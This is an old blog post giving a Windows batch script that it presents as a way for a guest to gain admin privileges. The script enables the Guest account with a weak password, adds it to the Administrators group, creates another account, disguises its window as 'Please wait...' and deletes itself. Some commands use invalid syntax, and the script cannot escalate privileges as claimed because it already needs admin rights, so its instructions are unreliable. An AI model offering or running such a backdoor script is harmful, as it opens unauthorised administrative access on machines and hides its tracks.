Wednesday, January 11, 2012

How to get the admin privilages.

The below code will allow a guest to be a admin . You will not be the actual admin but will get admin privilages


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0


Copy this to notepad and save the file as "anyname.bat" .make double click on this.....

No comments:

Post a Comment